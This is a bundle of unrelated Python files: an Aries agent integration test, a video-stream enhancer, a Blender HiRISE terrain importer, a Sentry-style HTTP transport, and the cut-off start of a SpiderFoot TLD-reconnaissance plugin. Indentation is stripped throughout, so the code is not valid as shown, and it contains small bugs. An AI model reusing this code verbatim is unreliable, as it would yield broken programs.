cls.aea_identity = Identity("", address=cls.aea_address)
cls.cwd = os.getcwd()
# check Aries Cloud Agents (ACA) is installed
res = shutil.which("aca-py")
if res is None:
pytest.skip(
"Please install Aries Cloud Agents first! See the following link: https://github.com/hyperledger/aries-cloudagent-python"
)
# run an ACA
# command: aca-py start --admin 127.0.0.1 8020 --admin-insecure-mode --inbound-transport http 0.0.0.0 8000 --outbound-transport http
cls.process = subprocess.Popen( # nosec
[
"aca-py",
"start",
"--admin",
cls.aca_admin_address,
str(cls.aca_admin_port),
"--admin-insecure-mode",
"--inbound-transport",
"http",
"0.0.0.0",
"8000",
"--outbound-transport",
"http",
]
)
time.sleep(4.0)
@pytest.mark.asyncio
async def test_connecting_to_aca(self):
configuration = ConnectionConfig(
host=self.aca_admin_address,
port=self.aca_admin_port,
connection_id=HTTPClientConnection.connection_id,
)
http_client_connection = HTTPClientConnection(
configuration=configuration, identity=self.aea_identity
)
http_client_connection.loop = asyncio.get_event_loop()
# Request messages
request_http_message = HttpMessage(
dialogue_reference=("1", ""),
target=0,
message_id=1,
performative=HttpMessage.Performative.REQUEST,
method="GET",
url="http://{}:{}/status".format(
self.aca_admin_address, self.aca_admin_port
),
headers="",
version="",
bodyy=b"",
)
request_http_message.counterparty = "ACA"
request_envelope = Envelope(
to="ACA",
sender="AEA",
protocol_id=HTTP_PROTOCOL_PUBLIC_ID,
message=request_http_message,
)
try:
# connect to ACA
await http_client_connection.connect()
assert http_client_connection.is_connected is True
# send request to ACA
await http_client_connection.send(envelope=request_envelope)
# receive response from ACA
response_envelop = await http_client_connection.receive()
# check the response
assert response_envelop.to == self.aea_address
assert response_envelop.sender == "HTTP Server"
assert response_envelop.protocol_id == HTTP_PROTOCOL_PUBLIC_ID
decoded_response_message = response_envelop.message
assert (
decoded_response_message.performative
== HttpMessage.Performative.RESPONSE
)
assert decoded_response_message.version == ""
assert decoded_response_message.status_code == 200
assert decoded_response_message.status_text == "OK"
assert decoded_response_message.headers is not None
assert decoded_response_message.version is not None
finally:
# disconnect from ACA
await http_client_connection.disconnect()
assert http_client_connection.is_connected is False
@pytest.mark.asyncio
async def test_end_to_end_aea_aca(self):
# AEA components
wallet = Wallet({DEFAULT_LEDGER: DEFAULT_PRIVATE_KEY_FILE})
identity = Identity(
name="my_aea_1",
address=wallet.addresses.get(DEFAULT_LEDGER),
default_address_key=DEFAULT_LEDGER,
)
configuration = ConnectionConfig(
host=self.aca_admin_address,
port=self.aca_admin_port,
connection_id=HTTPClientConnection.connection_id,
)
http_client_connection = HTTPClientConnection(
configuration=configuration, identity=identity,
)
resources = Resources()
resources.add_connection(http_client_connection)
# create AEA
aea = AEA(identity, wallet, resources)
# Add http protocol to AEA resources
http_protocol_configuration = ProtocolConfig.from_json(
yaml.safe_load(
open(
os.path.join(
self.cwd,
"packages",
"fetchai",
"protocols",
"http",
"protocol.yaml",
)
)
)
)
http_protocol = Protocol(http_protocol_configuration, HttpMessage.serializer())
resources.add_protocol(http_protocol)
# Request message & envelope
request_http_message = HttpMessage(
dialogue_reference=("", ""),
target=0,
message_id=1,
performative=HttpMessage.Performative.REQUEST,
method="GET",
url="http://{}:{}/status".format(
self.aca_admin_address, self.aca_admin_port
),
headers="",
version="",
bodyy=b"",
)
request_http_message.counterparty = "ACA"
request_envelope = Envelope(
to="ACA",
sender="AEA",
protocol_id=HTTP_PROTOCOL_PUBLIC_ID,
message=request_http_message,
)
# add a simple skill with handler
skill_context = SkillContext(aea.context)
skill_config = SkillConfig(
name="simple_skill", author="fetchai", version="0.1.0"
)
aea_handler = AEAHandler(skill_context=skill_context, name="aea_handler")
simple_skill = Skill(
skill_config, skill_context, handlers={aea_handler.name: aea_handler}
)
resources.add_skill(simple_skill)
# add error skill to AEA
error_skill = Skill.from_dir(
os.path.join(AEA_DIR, "skills", "error"), agent_context=aea.context
)
resources.add_skill(error_skill)
# start AEA thread
t_aea = Thread(target=aea.start)
try:
t_aea.start()
time.sleep(1.0)
aea.outbox.put(request_envelope)
time.sleep(5.0)
assert (
aea_handler.handled_message.performative
== HttpMessage.Performative.RESPONSE
)
assert aea_handler.handled_message.version == ""
assert aea_handler.handled_message.status_code == 200
assert aea_handler.handled_message.status_text == "OK"
assert aea_handler.handled_message.headers is not None
assert aea_handler.handled_message.version is not None
finally:
aea.stop()
t_aea.join()
@classmethod
def teardown_class(cls):
# terminate the ACA
cls.process.terminate()
class AEAHandler(Handler):
"""The handler for the AEA."""
SUPPORTED_PROTOCOL = HttpMessage.protocol_id # type: Optional[ProtocolId]
def __init__(self, **kwargs):
"""Initialize the handler."""
super().__init__(**kwargs)
self.kwargs = kwargs
self.handled_message = None
def setup(self) -> None:
"""Implement the setup for the handler."""
pass
def handle(self, message: Message) -> None:
"""
Implement the reaction to a message.
:param message: the message
:return: None
"""
self.handled_message = message
def teardown(self) -> None:
"""
Implement the handler teardown.
:return: None
"""
|
receiver.py
|
import queue
import threading
import cv2
from enhancer import Enhancer
import numpy as np
from tensorflow import keras
import time
from stream import Streamer
output_dir = 'frames'
q = queue.Queue()
q_out = queue.Queue()
# model = keras.models.load_model('models/generator.h5')
# inputs = keras.Input((None, None, 3))
# output = model(inputs)
# model = keras.models.Model(inputs, output)
stream_addr = 'videoplayback.mp4' # rtmp://192.168.1.7/live/test'
while True:
cap = cv2.VideoCapture(stream_addr)
if cap.isOpened():
break
else:
time.sleep(0.3)
width = 640*3
height = 360*3
fps = 30.
stream = Streamer(height, width, fps)
enhancer = Enhancer()
def read():
while True:
ret, frame = cap.read()
if frame is not None:
im_rgb = cv2.cvtColor(frame, cv2.COLOR_BGR2RGB)
q.put(im_rgb)
#print(im_rgb.tostring())
cap.release()
def enhance():
while True:
print("Q: %d" % q.qsize())
if q.qsize() > 0:
frame = q.get()
sr = enhancer.enhance(frame)
q_out.put(sr)
q.task_done()
def send():
i = 0
while True:
print("Q_OUT: %d" % q_out.qsize())
if True:#stream.get_video_frame_buffer_state() < fps and q_out.qsize() > 0:
frame = q_out.get()
stream.send_video_frame(frame, frame_counter=None)
i += 1
q_out.task_done()
r = threading.Thread(name='read', target=read)
e = threading.Thread(name='enhance', target=enhance)
s = threading.Thread(name='send', target=send)
r.start()
e.start()
s.start()
|
import_img.py
|
# ##### BEGIN GPL LICENSE BLOCK #####
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU General Public License
# as published by the Free Software Foundation; either version 2
# of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
#
# ##### END GPL LICENSE BLOCK #####
"""
This script can import a HiRISE DTM .IMG file.
"""
import bpy
from bpy.props import *
from struct import pack, unpack
import os
import queue, threading
class image_props:
''' keeps track of image attributes throughout the hirise_dtm_helper class '''
def __init__(self, name, dimensions, pixel_scale):
self.name( name )
self.dims( dimensions )
self.processed_dims( dimensions )
self.pixel_scale( pixel_scale )
def dims(self, dims=None):
if dims is not None:
self.__dims = dims
return self.__dims
def processed_dims(self, processed_dims=None):
if processed_dims is not None:
self.__processed_dims = processed_dims
return self.__processed_dims
def name(self, name=None):
if name is not None:
self.__name = name
return self.__name
def pixel_scale(self, pixel_scale=None):
if pixel_scale is not None:
self.__pixel_scale = pixel_scale
return self.__pixel_scale
class hirise_dtm_helper(object):
''' methods to understand/import a HiRISE DTM formatted as a PDS .IMG '''
def __init__(self, context, filepath):
self.__context = context
self.__filepath = filepath
self.__ignore_value = 0x00000000
self.__bin_mode = 'BIN6'
self.scale( 1.0 )
self.__cropXY = False
self.marsRed(False)
def bin_mode(self, bin_mode=None):
if bin_mode != None:
self.__bin_mode = bin_mode
return self.__bin_mode
def scale(self, scale=None):
if scale is not None:
self.__scale = scale
return self.__scale
def crop(self, widthX, widthY, offX, offY):
self.__cropXY = [ widthX, widthY, offX, offY ]
return self.__cropXY
def marsRed(self, marsRed=None):
if marsRed is not None:
self.__marsRed = marsRed
return self.__marsRed
def dbg(self, mesg):
print(mesg)
############################################################################
## PDS Label Operations
############################################################################
def parsePDSLabel(self, labelIter, currentObjectName=None, level = ""):
# Let's parse this thing... semi-recursively
## I started writing this caring about everything in the PDS standard but ...
## it's a mess and I only need a few things -- thar be hacks below
## Mostly I just don't care about continued data from previous lines
label_structure = []
# When are we done with this level?
endStr = "END"
if not currentObjectName is None:
endStr = "END_OBJECT = %s" % currentObjectName
line = ""
while not line.rstrip() == endStr:
line = next(labelIter)
# Get rid of comments
comment = line.find("/*")
if comment > -1:
line = line[:comment]
# Take notice of objects
if line[:8] == "OBJECT =":
objName = line[8:].rstrip()
label_structure.append(
(
objName.lstrip().rstrip(),
self.parsePDSLabel(labelIter, objName.lstrip().rstrip(), level + " ")
)
)
elif line.find("END_OBJECT =") > -1:
pass
elif len(line.rstrip().lstrip()) > 0:
key_val = line.split(" = ", 2)
if len(key_val) == 2:
label_structure.append( (key_val[0].rstrip().lstrip(), key_val[1].rstrip().lstrip()) )
return label_structure
# There has got to be a better way in python?
def iterArr(self, label):
for line in label:
yield line
def getPDSLabel(self, img):
# Just takes file and stores it into an array for later use
label = []
done = False;
# Grab label into array of lines
while not done:
line = str(img.readline(), 'utf-8')
if line.rstrip() == "END":
done = True
label.append(line)
return (label, self.parsePDSLabel(self.iterArr(label)))
def getLinesAndSamples(self, label):
''' uses the parsed PDS Label to get the LINES and LINE_SAMPLES parameters
from the first object named "IMAGE" -- is hackish
'''
lines = None
line_samples = None
for obj in label:
if obj[0] == "IMAGE":
return self.getLinesAndSamples(obj[1])
if obj[0] == "LINES":
lines = int(obj[1])
if obj[0] == "LINE_SAMPLES":
line_samples = int(obj[1])
return ( line_samples, lines )
def getValidMinMax(self, label):
''' uses the parsed PDS Label to get the VALID_MINIMUM and VALID_MAXIMUM parameters
from the first object named "IMAGE" -- is hackish
'''
for obj in label:
if obj[0] == "IMAGE":
return self.getValidMinMax(obj[1])
if obj[0] == "VALID_MINIMUM":
vmin = float(obj[1])
if obj[0] == "VALID_MAXIMUM":
vmax = float(obj[1])
return vmin, vmax
def getMissingConstant(self, label):
''' uses the parsed PDS Label to get the MISSING_CONSTANT parameter
from the first object named "IMAGE" -- is hackish
'''
for obj in label:
if obj[0] == "IMAGE":
return self.getMissingConstant(obj[1])
if obj[0] == "MISSING_CONSTANT":
bit_string_repr = obj[1]
# This is always the same for a HiRISE image, so we are just checking it
# to be a little less insane here. If someone wants to support another
# constant then go for it. Just make sure this one continues to work too
pieces = bit_string_repr.split("#")
if pieces[0] == "16" and pieces[1] == "FF7FFFFB":
ignore_value = unpack("f", pack("I", 0xFF7FFFFB))[0]
return ( ignore_value )
############################################################################
## Image operations
############################################################################
# decorator to run a generator in a thread
def threaded_generator(func):
def start(*args,**kwargs):
# Setup a queue of returned items
yield_q = queue.Queue()
# Thread to run generator inside of
def worker():
for obj in func(*args,**kwargs): yield_q.put(obj)
yield_q.put(StopIteration)
t = threading.Thread(target=worker)
t.start()
# yield from the queue as fast as we can
obj = yield_q.get()
while obj is not StopIteration:
yield obj
obj = yield_q.get()
# return the thread-wrapped generator
return start
@threaded_generator
def bin2(self, image_iter, bin2_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//2, processed_dims[1]//2 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*2, pixel_scale[1]*2 )
img_props.pixel_scale( pixel_scale )
yield img_props
# Take two lists [a1, a2, a3], [b1, b2, b3] and combine them into one
# list of [a1 + b1, a2+b2, ... ] as long as both values are not ignorable
combine_fun = lambda a, b: a != self.__ignore_value and b != self.__ignore_value and a + b or self.__ignore_value
line_count = 0
ret_list = []
for line in image_iter:
if line_count == 1:
line_count = 0
tmp_list = list(map(combine_fun, line, last_line))
while len(tmp_list) > 1:
ret_list.append( combine_fun( tmp_list[0], tmp_list[1] ) )
del tmp_list[0:2]
yield ret_list
ret_list = []
# last_line = line # UNUSED
line_count += 1
@threaded_generator
def bin6(self, image_iter, bin6_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//6, processed_dims[1]//6 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*6, pixel_scale[1]*6 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin6_method_type == "FAST":
bin6_method = self.bin6_real_fast
else:
bin6_method = self.bin6_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 6:
yield bin6_method( raw_data )
line_count = 0
raw_data = []
def bin6_real(self, raw_data):
''' does a 6x6 sample of raw_data and returns a single line of data '''
# TODO: make this more efficient
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//6):
ints = list(filter( filter_fun, raw_data[0][base:base+6] +
raw_data[1][base:base+6] +
raw_data[2][base:base+6] +
raw_data[3][base:base+6] +
raw_data[4][base:base+6] +
raw_data[5][base:base+6] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 6
return binned_data
def bin6_real_fast(self, raw_data):
''' takes a single value from each 6x6 sample of raw_data and returns a single line of data '''
# TODO: make this more efficient
binned_data = []
base = 0
for i in range(0, len(raw_data[0])//6):
binned_data.append( raw_data[0][base] )
base += 6
return binned_data
@threaded_generator
def bin12(self, image_iter, bin12_method_type="SLOW"):
''' this is an iterator that: Given an image iterator will yield binned lines '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
processed_dims = ( processed_dims[0]//12, processed_dims[1]//12 )
img_props.processed_dims( processed_dims )
# each pixel is larger as binning gets larger
pixel_scale = img_props.pixel_scale()
pixel_scale = ( pixel_scale[0]*12, pixel_scale[1]*12 )
img_props.pixel_scale( pixel_scale )
yield img_props
if bin12_method_type == "FAST":
bin12_method = self.bin12_real_fast
else:
bin12_method = self.bin12_real
raw_data = []
line_count = 0
for line in image_iter:
raw_data.append( line )
line_count += 1
if line_count == 12:
yield bin12_method( raw_data )
line_count = 0
raw_data = []
def bin12_real(self, raw_data):
''' does a 12x12 sample of raw_data and returns a single line of data '''
binned_data = []
# Filter out those unwanted hugely negative values...
filter_fun = lambda a: self.__ignore_value.__ne__(a)
base = 0
for i in range(0, len(raw_data[0])//12):
ints = list(filter( filter_fun, raw_data[0][base:base+12] +
raw_data[1][base:base+12] +
raw_data[2][base:base+12] +
raw_data[3][base:base+12] +
raw_data[4][base:base+12] +
raw_data[5][base:base+12] +
raw_data[6][base:base+12] +
raw_data[7][base:base+12] +
raw_data[8][base:base+12] +
raw_data[9][base:base+12] +
raw_data[10][base:base+12] +
raw_data[11][base:base+12] ))
len_ints = len( ints )
# If we have all pesky values, return a pesky value
if len_ints == 0:
binned_data.append( self.__ignore_value )
else:
binned_data.append( sum(ints) / len(ints) )
base += 12
return binned_data
def bin12_real_fast(self, raw_data):
''' takes a single value from each 12x12 sample of raw_data and returns a single line of data '''
return raw_data[0][11::12]
@threaded_generator
def cropXY(self, image_iter, XSize=None, YSize=None, XOffset=0, YOffset=0):
''' return a cropped portion of the image '''
img_props = next(image_iter)
# dimensions shrink as we remove pixels
processed_dims = img_props.processed_dims()
if XSize is None:
XSize = processed_dims[0]
if YSize is None:
YSize = processed_dims[1]
if XSize + XOffset > processed_dims[0]:
self.dbg("WARNING: Upstream dims are larger than cropped XSize dim")
XSize = processed_dims[0]
XOffset = 0
if YSize + YOffset > processed_dims[1]:
self.dbg("WARNING: Upstream dims are larger than cropped YSize dim")
YSize = processed_dims[1]
YOffset = 0
img_props.processed_dims( (XSize, YSize) )
yield img_props
currentY = 0
for line in image_iter:
if currentY >= YOffset and currentY <= YOffset + YSize:
yield line[XOffset:XOffset+XSize]
# Not much point in reading the rest of the data...
if currentY == YOffset + YSize:
return
currentY += 1
@threaded_generator
def getImage(self, img, img_props):
''' Assumes 32-bit pixels -- bins image '''
dims = img_props.dims()
self.dbg("getting image (x,y): %d,%d" % ( dims[0], dims[1] ))
# setup to unpack more efficiently.
x_len = dims[0]
# little endian (PC_REAL)
unpack_str = "<"
# unpack_str = ">"
unpack_bytes_str = "<"
pack_bytes_str = "="
# 32 bits/sample * samples/line = y_bytes (per line)
x_bytes = 4*x_len
for x in range(0, x_len):
# 32-bit float is "d"
unpack_str += "f"
unpack_bytes_str += "I"
pack_bytes_str += "I"
# Each iterator yields this first ... it is for reference of the next iterator:
yield img_props
for y in range(0, dims[1]):
# pixels is a byte array
pixels = b''
while len(pixels) < x_bytes:
new_pixels = img.read( x_bytes - len(pixels) )
pixels += new_pixels
if len(new_pixels) == 0:
x_bytes = -1
pixels = []
self.dbg("Uh oh: unexpected EOF!")
if len(pixels) == x_bytes:
if 0 == 1:
repacked_pixels = b''
for integer in unpack(unpack_bytes_str, pixels):
repacked_pixels += pack("=I", integer)
yield unpack( unpack_str, repacked_pixels )
else:
yield unpack( unpack_str, pixels )
@threaded_generator
def shiftToOrigin(self, image_iter, image_min_max):
''' takes a generator and shifts the points by the valid minimum
also removes points with value self.__ignore_value and replaces them with None
'''
# use the passed in values ...
valid_min = image_min_max[0]
# pass on dimensions/pixel_scale since we don't modify them here
yield next(image_iter)
self.dbg("shiftToOrigin filter enabled...");
# closures rock!
def normalize_fun(point):
if point == self.__ignore_value:
return None
return point - valid_min
for line in image_iter:
yield list(map(normalize_fun, line))
self.dbg("shifted all points")
@threaded_generator
def scaleZ(self, image_iter, scale_factor):
''' scales the mesh values by a factor '''
# pass on dimensions since we don't modify them here
yield next(image_iter)
scale_factor = self.scale()
def scale_fun(point):
try:
return point * scale_factor
except:
return None
for line in image_iter:
yield list(map(scale_fun, line))
def genMesh(self, image_iter):
'''Returns a mesh object from an image iterator this has the
value-added feature that a value of "None" is ignored
'''
# Get the output image size given the above transforms
img_props = next(image_iter)
# Let's interpolate the binned DTM with blender -- yay meshes!
coords = []
faces = []
face_count = 0
coord = -1
max_x = img_props.processed_dims()[0]
max_y = img_props.processed_dims()[1]
scale_x = self.scale() * img_props.pixel_scale()[0]
scale_y = self.scale() * img_props.pixel_scale()[1]
line_count = 0
# seed the last line (or previous line) with a line
last_line = next(image_iter)
point_offset = 0
previous_point_offset = 0
# Let's add any initial points that are appropriate
x = 0
point_offset += len( last_line ) - last_line.count(None)
for z in last_line:
if z != None:
coords.extend([x*scale_x, 0.0, z])
coord += 1
x += 1
# We want to ignore points with a value of "None" but we also need to create vertices
# with an index that we can re-create on the next line. The solution is to remember
# two offsets: the point offset and the previous point offset.
# these offsets represent the point index that blender gets -- not the number of
# points we have read from the image
# if "x" represents points that are "None" valued then conceptually this is how we
# think of point indices:
#
# previous line: offset0 x x +1 +2 +3
# current line: offset1 x +1 +2 +3 x
# once we can map points we can worry about making triangular or square faces to fill
# the space between vertices so that blender is more efficient at managing the final
# structure.
self.dbg('generate mesh coords/faces from processed image data...')
# read each new line and generate coordinates+faces
for dtm_line in image_iter:
# Keep track of where we are in the image
line_count += 1
y_val = line_count*-scale_y
if line_count % 31 == 0:
self.dbg("reading image... %d of %d" % ( line_count, max_y ))
# Just add all points blindly
# TODO: turn this into a map
x = 0
for z in dtm_line:
if z != None:
coords.extend( [x*scale_x, y_val, z] )
coord += 1
x += 1
# Calculate faces
for x in range(0, max_x - 1):
vals = [
last_line[ x + 1 ],
last_line[ x ],
dtm_line[ x ],
dtm_line[ x + 1 ],
]
# Two or more values of "None" means we can ignore this block
none_val = vals.count(None)
# Common case: we can create a square face
if none_val == 0:
faces.extend( [
previous_point_offset,
previous_point_offset+1,
point_offset+1,
point_offset,
] )
face_count += 1
elif none_val == 1:
# special case: we can implement a triangular face
## NB: blender 2.5 makes a triangular face when the last coord is 0
# TODO: implement a triangular face
pass
if vals[1] != None:
previous_point_offset += 1
if vals[2] != None:
point_offset += 1
# Squeeze the last point offset increment out of the previous line
if last_line[-1] != None:
previous_point_offset += 1
# Squeeze the last point out of the current line
if dtm_line[-1] != None:
point_offset += 1
# remember what we just saw (and forget anything before that)
last_line = dtm_line
self.dbg('generate mesh from coords/faces...')
me = bpy.data.meshes.new(img_props.name()) # create a new mesh
self.dbg('coord: %d' % coord)
self.dbg('len(coords): %d' % len(coords))
self.dbg('len(faces): %d' % len(faces))
self.dbg('setting coords...')
me.vertices.add(len(coords)/3)
me.vertices.foreach_set("co", coords)
self.dbg('setting faces...')
me.faces.add(len(faces)/4)
me.faces.foreach_set("vertices_raw", faces)
self.dbg('running update...')
me.update()
bin_desc = self.bin_mode()
if bin_desc == 'NONE':
bin_desc = 'No Bin'
ob=bpy.data.objects.new("DTM - %s" % bin_desc, me)
return ob
def marsRedMaterial(self):
''' produce some approximation of a mars surface '''
mat = None
for material in bpy.data.materials:
if material.getName() == "redMars":
mat = material
if mat is None:
mat = bpy.data.materials.new("redMars")
mat.diffuse_shader = 'MINNAERT'
mat.setRGBCol( (0.426, 0.213, 0.136) )
mat.setDiffuseDarkness(0.8)
mat.specular_shader = 'WARDISO'
mat.setSpecCol( (1.000, 0.242, 0.010) )
mat.setSpec( 0.010 )
mat.setRms( 0.100 )
return mat
################################################################################
# Yay, done with helper functions ... let's see the abstraction in action! #
################################################################################
def execute(self):
self.dbg('opening/importing file: %s' % self.__filepath)
img = open(self.__filepath, 'rb')
self.dbg('read PDS Label...')
(label, parsedLabel) = self.getPDSLabel(img)
self.dbg('parse PDS Label...')
image_dims = self.getLinesAndSamples(parsedLabel)
img_min_max_vals = self.getValidMinMax(parsedLabel)
self.__ignore_value = self.getMissingConstant(parsedLabel)
self.dbg('import/bin image data...')
# MAGIC VALUE? -- need to formalize this to rid ourselves of bad points
img.seek(28)
# Crop off 4 lines
img.seek(4*image_dims[0])
# HiRISE images (and most others?) have 1m x 1m pixels
pixel_scale=(1, 1)
# The image we are importing
image_name = os.path.basename( self.__filepath )
# Set the properties of the image in a manageable object
img_props = image_props( image_name, image_dims, pixel_scale )
# Get an iterator to iterate over lines
image_iter = self.getImage(img, img_props)
## Wrap the image_iter generator with other generators to modify the dtm on a
## line-by-line basis. This creates a stream of modifications instead of reading
## all of the data at once, processing all of the data (potentially several times)
## and then handing it off to blender
## TODO: find a way to alter projection based on transformations below
if self.__cropXY:
image_iter = self.cropXY(image_iter,
XSize=self.__cropXY[0],
YSize=self.__cropXY[1],
XOffset=self.__cropXY[2],
YOffset=self.__cropXY[3]
)
# Select an appropriate binning mode
## TODO: generalize the binning fn's
bin_mode = self.bin_mode()
bin_mode_funcs = {
'BIN2': self.bin2(image_iter),
'BIN6': self.bin6(image_iter),
'BIN6-FAST': self.bin6(image_iter, 'FAST'),
'BIN12': self.bin12(image_iter),
'BIN12-FAST': self.bin12(image_iter, 'FAST')
}
if bin_mode in bin_mode_funcs.keys():
image_iter = bin_mode_funcs[ bin_mode ]
image_iter = self.shiftToOrigin(image_iter, img_min_max_vals)
if self.scale != 1.0:
image_iter = self.scaleZ(image_iter, img_min_max_vals)
# Create a new mesh object and set data from the image iterator
self.dbg('generating mesh object...')
ob_new = self.genMesh(image_iter)
if self.marsRed():
mars_red = self.marsRedMaterial()
ob_new.materials += [mars_red]
if img:
img.close()
# Add mesh object to the current scene
scene = self.__context.scene
self.dbg('linking object to scene...')
scene.objects.link(ob_new)
scene.update()
# deselect other objects
bpy.ops.object.select_all(action='DESELECT')
# scene.objects.active = ob_new
# Select the new mesh
ob_new.select = True
self.dbg('done with ops ... now wait for blender ...')
return ('FINISHED',)
def load(operator, context, filepath, scale, bin_mode, cropVars, marsRed):
print("Bin Mode: %s" % bin_mode)
print("Scale: %f" % scale)
helper = hirise_dtm_helper(context,filepath)
helper.bin_mode( bin_mode )
helper.scale( scale )
if cropVars:
helper.crop( cropVars[0], cropVars[1], cropVars[2], cropVars[3] )
helper.execute()
if marsRed:
helper.marsRed(marsRed)
print("Loading %s" % filepath)
return {'FINISHED'}
|
transport.py
|
"""
track.transport
~~~~~~~~~~~~~~~
:copyright: (c) 2013 Simon Zimmermann.
:copyright: (c) 2010-2012 by the Sentry Team.
"""
from __future__ import absolute_import
import atexit
import logging
import os
import requests
import threading
import time
from .compat import Queue
DEFAULT_TIMEOUT = 10
logger = logging.getLogger('track.errors')
class AsyncWorker(object):
_terminator = object()
def __init__(self, shutdown_timeout=DEFAULT_TIMEOUT):
self._queue = Queue(-1)
self._lock = threading.Lock()
self._thread = None
self.options = {
'shutdown_timeout': shutdown_timeout,
}
self.start()
def main_thread_terminated(self):
size = self._queue.qsize()
if size:
timeout = self.options['shutdown_timeout']
print("Sentry is attempting to send %s pending error messages" % size)
print("Waiting up to %s seconds" % timeout)
if os.name == 'nt':
print("Press Ctrl-Break to quit")
else:
print("Press Ctrl-C to quit")
self.stop(timeout=timeout)
def start(self):
"""
Starts the task thread.
"""
self._lock.acquire()
try:
if not self._thread:
self._thread = threading.Thread(target=self._target)
self._thread.setDaemon(True)
self._thread.start()
finally:
self._lock.release()
atexit.register(self.main_thread_terminated)
def stop(self, timeout=None):
"""
Stops the task thread. Synchronous!
"""
self._lock.acquire()
try:
if self._thread:
self._queue.put_nowait(self._terminator)
self._thread.join(timeout=timeout)
self._thread = None
finally:
self._lock.release()
def queue(self, callback, *args, **kwargs):
self._queue.put_nowait((callback, args, kwargs))
def _target(self):
while 1:
record = self._queue.get()
if record is self._terminator:
break
callback, args, kwargs = record
try:
callback(*args, **kwargs)
except Exception:
logger.error('Failed processing job', exc_info=True)
time.sleep(0)
class Response(object):
def __init__(self, res):
self._obj = res
def __getattr__(self, attrib):
return getattr(self._obj, attrib)
def has_data(self):
if not hasattr(self, '_has_data'):
content_length = self.headers.get('Content-Length')
if content_length:
self._has_data = int(content_length) > 0
else:
self._has_data = len(self.content) > 0
return self._has_data
def data(self):
if not self.has_data():
return ''
if 'application/json' in self.headers.get('Content-Type'):
return self.json()
return self.content
class HTTPTransport(object):
asyncronous = False
def __init__(self, keep_alive=False, timeout=None):
self.keep_alive = keep_alive
self.timeout = timeout or 1.0
def client(self):
if self.keep_alive:
if not hasattr(self, '_session'):
self._session = requests.session()
return self._session
return requests
def send_sync(self, url, method, data=None, params=None, headers=None, files=None, success_cb=None, failure_cb=None):
try:
httpclient = getattr(self.client(), method.lower())
rv = httpclient(url, params=params, data=data, headers=headers, files=files, timeout=self.timeout)
rv.raise_for_status()
res = Response(rv)
if success_cb:
success_cb(res)
return res
except requests.HTTPError as ex:
ex.response = Response(ex.response)
if failure_cb:
failure_cb(ex)
raise ex
except Exception as ex:
if failure_cb:
failure_cb(ex)
raise ex
send = send_sync
class ThreadedHTTPTransport(HTTPTransport):
asyncronous = True
def get_worker(self):
if not hasattr(self, '_worker'):
self._worker = AsyncWorker()
return self._worker
def send(self, url, method, data=None, params=None, headers=None, success_cb=None, failure_cb=None):
self.get_worker().queue(self.send_sync, url, method, data=data, params=params, headers=headers, success_cb=success_cb, failure_cb=failure_cb)
|
sfp_tldsearch.py
|
# -*- coding: utf-8 -*-
# -------------------------------------------------------------------------------
# Name: sfp_tldsearch
# Purpose: SpiderFoot plug-in for identifying the existence of this target
# on other TLDs.
#
# Author: Steve Micallef <steve@binarypool.com>
#
# Created: 31/08/2013
# Copyright: (c) Steve Micallef 2013
# Licence: MIT
# -------------------------------------------------------------------------------
import random
import threading
import time
import dns.resolver
from spiderfoot import SpiderFootEvent, SpiderFootPlugin
class sfp_tldsearch(SpiderFootPlugin):
meta = {
'name': "TLD Searcher",
'summary': "Search all Internet TLDs for domains with the same name as the target (this can be very slow.)",
'flags': ["slow"],
'useCases': ["Footprint"],
'categories': ["DNS"]
}
# Default options
opts = {
'activeonly': False, # Only report domains that have content (try to fetch the page)
'skipwildcards': True,
'_maxthreads': 50
}
# Option descriptions
optdescs = {
'activeonly': "Only report domains that have content (try to fetch the page)?",
"skipwildcards": "Skip TLDs and sub-TLDs that have wildcard DNS.",
"_maxthreads": "Maximum threads"
}
# Internal results tracking
results = None
# Track TLD search results between threads
tldResults = dict()
lock = None
def setup(self, sfc, userOpts=dict()):
self.sf = sfc
self.results = self.tempStorage()
self.__dataSource__ = "DNS"
self.lock = threading.Lock()
for opt in list(userOpts.keys()):
self.opts[opt] = userOpts[opt]
# What events is this module interested in for input
def watchedEvents(self):
return ["INTERNET_NAME"]
# What events this module produces
# This is to support the end user in selecting modules based on events
# produced.
def producedEvents(self):
return ["SIMILARDOMAIN"]
def tryTld(self, target, tld):
resolver = dns.resolver.Resolver()
resolver.timeout = 1
resolver.lifetime = 1
resolver.search = list()
if self.opts.get('_dnsserver', "") != "":
resolver.nameservers = [self.opts['_dnsserver']]
if self.opts['skipwildcards'] and self.sf.checkDnsWildcard(tld):
return
try:
if not self.sf.resolveHost(target) and not self.sf.resolveHost6(target):
with self.lock:
self.tldResults[target] = False
else:
with self.lock:
self.tldResults[target] = True
except Exception:
with self.lock:
self.tldResults[target] = False
def tryTldWrapper(self, tldList, sourceEvent):
self.tldResults = dict()
running = True
t = []
# Spawn threads for scanning
self.info(f"Spawning threads to check TLDs: {tldList}")
for i, pair in enumerate(tldList):
(domain, tld) = pair
